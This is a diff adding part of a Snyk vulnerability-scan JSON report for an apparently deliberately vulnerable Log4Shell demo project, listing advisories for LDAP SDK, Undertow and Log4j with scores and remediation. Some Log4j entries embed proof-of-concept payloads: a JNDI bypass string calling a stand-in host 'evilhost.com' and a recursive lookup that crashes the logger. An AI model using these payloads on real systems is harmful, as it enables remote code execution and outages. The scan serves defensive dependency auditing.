+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:49:40.956024Z"
+ }
+ ],
+ "description": "## Overview\r\n[com.unboundid:unboundid-ldapsdk](https://github.com/pingidentity/ldapsdk) is a UnboundID LDAP SDK for Java.\r\n\r\nAffected version of this package are vulnerable to User Impersonation. The process function in the `SimpleBindRequest` class which check for empty password when running in synchronous mode.\r\n\r\n## Remediation\r\nUpgrade `com.unboundid:unboundid-ldapsdk` to version 4.0.5 or higher.\r\n\r\n## References\r\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1557531)\r\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000134)\r\n- [GitHub Commit](https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6)",
+ "epssDetails": {
+ "percentile": "0.80961",
+ "probability": "0.00729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2018-1000134"
+ ],
+ "CWE": [
+ "CWE-284"
+ ]
+ },
+ "packageName": "com.unboundid:unboundid-ldapsdk",
+ "proprietary": false,
+ "creationTime": "2018-03-16T00:00:00Z",
+ "functions_new": [
+ {
+ "version": [
+ "[,4.0.5)"
+ ],
+ "functionId": {
+ "className": "com.unboundid.ldap.sdk.SimpleBindRequest",
+ "functionName": "process"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2018-03-16T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "com.unboundid",
+ "artifactId": "unboundid-ldapsdk"
+ },
+ "publicationTime": "2018-04-01T14:18:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:49:40.956024Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "upgradePath": [
+ false,
+ "com.unboundid:unboundid-ldapsdk@4.0.5"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "com.unboundid:unboundid-ldapsdk",
+ "version": "3.1.1"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "low",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014",
+ "title": "Remote Code Execution (RCE)",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta9,2.3.1)",
+ "[2.4,2.12.2)",
+ "[2.13.0,2.16.0)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "2.3.1",
+ "2.12.2",
+ "2.16.0"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f",
+ "title": "Apache Pony Mail"
+ },
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security Page"
+ },
+ {
+ "url": "https://twitter.com/marcioalm/status/1471740771581652995",
+ "title": "Twitter Post"
+ },
+ {
+ "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml",
+ "title": "Nuclei Templates"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9,
+ "modificationTime": "2024-03-11T09:51:51.455756Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 8.1,
+ "modificationTime": "2024-03-11T09:53:56.296034Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T13:59:32.295395Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:51:51.455756Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 8.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:56.296034Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. 
If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99901",
+ "probability": "0.97307",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-45046"
+ ],
+ "CWE": [
+ "CWE-94"
+ ],
+ "GHSA": [
+ "GHSA-7rjr-3q55-vv33"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-14T18:28:31.339218Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-14T18:01:28Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "Nuclei Templates",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-14T18:44:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:25.837600Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.16.0"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "title": "Denial of Service (DoS)",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+ "credit": [
+ "Hideki Okamoto of Akamai Technologies"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta9,2.3.1)",
+ "[2.4,2.12.3)",
+ "[2.13.0,2.17.0)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "2.3.1",
+ "2.12.3",
+ "2.17.0"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "high",
+ "cvssScore": 7.5,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/LOG4J2-3230",
+ "title": "JIRA Issue"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 5.9,
+ "modificationTime": "2024-03-11T09:51:51.570474Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 5.9,
+ "modificationTime": "2024-03-11T09:53:58.516498Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+ "assigner": "Snyk",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T13:59:38.288854Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "medium",
+ "baseScore": 5.9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:51:51.570474Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:58.516498Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n",
+ "epssDetails": {
+ "percentile": "0.99523",
+ "probability": "0.95998",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-45105"
+ ],
+ "CWE": [
+ "CWE-400"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-17T18:23:58.542986Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-17T18:20:21Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-18T07:05:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:53:58.516498Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "high",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.17.0"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "title": "Arbitrary Code Execution",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta7,2.3.2)",
+ "[2.4,2.12.4)",
+ "[2.13.0,2.17.1)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "2.3.2",
+ "2.12.4",
+ "2.17.1"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.6,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security Page"
+ },
+ {
+ "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/LOG4J2-3293",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1",
+ "title": "Openwall Mail"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 6.6,
+ "modificationTime": "2024-03-11T09:48:51.766965Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 6.6,
+ "modificationTime": "2024-03-11T09:53:58.472982Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:04:47.220633Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:48:51.766965Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:58.472982Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n",
+ "epssDetails": {
+ "percentile": "0.89722",
+ "probability": "0.02239",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-44832"
+ ],
+ "CWE": [
+ "CWE-94"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-28T19:42:55.818691Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-28T19:42:53Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-28T20:17:52Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:53:58.472982Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
